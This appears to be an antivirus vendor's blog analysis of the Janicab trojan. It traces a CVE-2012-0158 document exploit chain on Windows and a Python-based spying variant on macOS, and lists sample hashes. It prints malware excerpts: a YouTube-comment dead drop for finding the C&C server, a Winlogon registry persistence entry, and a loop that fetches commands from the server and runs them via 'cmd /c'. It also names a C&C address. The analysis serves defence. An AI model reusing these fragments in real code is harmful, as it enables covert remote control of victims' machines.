Multisystem Trojan Janicab attacks Windows and MacOSX via scripts

On Friday 12th July a warning from an avast! fan about a new polymorphic multisystem threat came to an inbox of avast company. Moreover, an archive of malicious files discussed here were attached. Some of them have been uploaded to Virustotal and therefore they have been shared with computer security professionals on the same day. A weekend had passed by and articles full of excitement about a new Trojan for MacOs started to appear on the web. We decided to make a thorough analysis and not to quickly jump on the bandwagon. The key observation is that the final payload comes in the form of scripts needed to be interpreted by Windows Script Console resp. Python in the case of MacOs. Moreover a script generator that creates new malicious Windows file shortcuts was also included.

Windows version

A chain of events that installs a malicious Visual Basic script on Windows platform looks like this

win32_janicab_chain

In the beginning there is a malicious Office Open XML Document containing two embedded binary files. One of them is called ActiveX.bin and it carries the main shell-code that is triggered by a widely spread exploit CVE-2012-0158 (under special settings ActiveX controls in MSCOMCTL.OCX trigger code execution). Shell-code itself in decrypted with a initial loop that uses 0xEE as a one-byte key. Then a few API functions necessary for dropping of another file are resolved by a hash (VirtualAlloc, CreateFile, ReadFile, WriteFile, GetTempPath, CloseHandle). In the figure we can see a check of a magic value 0xB19B00B5 (a shell-code usually performs consequently this step twice, because a general memory search could return an address of its own assembly instead of the location in a data ). A temporary file “a.l” is created.

win32_janicab_shellcode2

The step that follows is decrypted from the second embedded binary with a name ActiveX1.bin. It is loaded into a buffer that is pointed by edi register. A two bytes and one double word are extracted and immediatelly used in a decryption routine (one-byte XOR with a key additively changed by a constant in every iteration). A dynamic linked library is dropped and loaded.

win32_janicab_activex

The dropper simply loads and executes two files in resources that are unencrypted. The first is a Word document that is not malicious and its purpose is not to raise any suspicion after opening such a document. The second is a malicious Visual Basic script “1.vbe” encoded with a Windows Script Encoder screnc.exe. This script is a final payload of the chain and is tagged with a version number “1.0.4″.

win32_dropper_script

Depending on the system version the malware seeks for an antivirus product in Windows Management Instrumentation (WMI) executing query “Select displayName from AntiVirusProduct” on the WMI object “winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2″. It stores a value into the variable installedAV. Then it randomly chooses a youtube.com link from a hard-coded list and evaluates a regular expression on the received content:

randLink = YouTubeLinks(Int((max-min+1)*Rnd+min))outputHTML = getPage(randLink, 60)

Set objRE = New RegExp
With objRE
.Pattern = “just something i made up for fun, check out my website at (.*) bye bye”
.IgnoreCase = True
End With

Set objMatch = objRE.Execute( outputHTML )

If objMatch.Count = 1 Then
server = “http://” & objMatch.Item(0).Submatches(0)
End If

if getPage(server & “/Status.php”, 30) = “OK” Then
serverExists = 1
End if

Seeking the pattern on the web in cached YouTube pages it turned out that an expression “111.90.152.210/cc” could have been returned as a C&C server address.

Persistence on the infected system is decided by C&C:

startupMethod = getPage(server & “/sMethod.php?av=” & installedAV, 60)

If it commands a keyword “reg” as a startup method then a registry file containing lines
“[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Shell”=”wscript.exe \”%userprofile%\\SystemFolder\\.vbe\””
will be imported.

Spying functionality is not present in this variant. The main malicious action is constantly awaiting commands from C&C to execute it on victims computer (getPage involves creating “InternetExplorer.Application” object and returning html content of the given address):

While 1
On Error Resume Next
commandData = getPage(server & “/gcm.php?sn=” & Serial, 30)If not IsNull(commandData) And commandData “” Then
s.Run “cmd /c ” & c, 0
End If

WScript.Sleep 60000
Wend

MacOsX version

As we mentioned in the introduction the variant for MacOs uses Python compiled scripts and it is described with a lot of relevant screenshots (another reference is here). It uses right-to-left override method at least to confuse a user while execution ( Windows malware uses similar masking). The internal version number said “3.0.6″ and so probably it was longer in development.

Spying activities consist of recording audio using command line tool called “Sound eXchange” and taking screenshots controlled by mouse actions (resolved by a freely distributed command line tool mt which is a shortcut for MouseTools ):

macos_janicab_scr

For comparison with the Windows version observe that a C&C server is obtained in very similar way:

macos_janicab_getcc

Persistence is achieved by adding an initial malicious script “runner.pyc” into cron:

macos_janicab_persistance

Script Builder

There is a simple php script available that creates an archive with a file shortcut that runs a script derived from a particular template and displays any desired distracting image. As a script template implicitly works a Windows version of Janicab. Even if methods of generating new samples seem basic it is interesting to see a malware coming as a whole package as it is in this case.

Sources
Finally MD5 of some selected samples with the detections of avast! engine are provided. Detections of samples connected with the Windows version are very low prevalent within AV products.

Janicab/StarterScreenShots.pyc 64e788f1599196e23b628466cac3f909 MacOs:Janicab-D [Trj]
Janicab/StarterRec.pyc fcd6aec6f73d98500af0d4717ec82ceb MacOs:Janicab-D [Trj]
Janicab/StarterCmdExec.pyc 9c9ca021bb33ce195c470cb22faef710 MacOs:Janicab-E [Trj]
Janicab/StarterNetUtils.pyc 3027d5589850d2fef3693a12ca4ec35e MacOs:Janicab-B [Trj]
Janicab/StarterSettings.pyc d85bd548decc7866ffd083329e23af8c MacOs:Janicab-A [Trj]
AmazingRaceCyprus.docx 73041092efeb04c4a5e9b6a1a217754c RTF:CVE-2012-0158-BO [Expl]
JoseMOlazagasti.docx fef7fdfe74c071310956a753679c80e5 RTF:CVE-2012-0158-BO [Expl]
AboutUs.docx b498d5de87575d4b999e203e71616b69 RTF:CVE-2012-0158-BO [Expl]
Encoded VB Script 11c987d626f12892f848a42f0a95f810 VBS:Janicab-A [Trj]
Dynamic Link Library #1 71eb77493e06b7c17c225cb36f5a054d Win32:Janicab-A [Drp]
Dynamic Link Library #2 1b8406562b7c4b5cdeb393539245f7c0 Win32:Janicab-A [Drp]

Acknowledgment
Sincere gratitude goes to my colleague Jaromír Ho?ejší for cooperation on this analysis.

Leave a Reply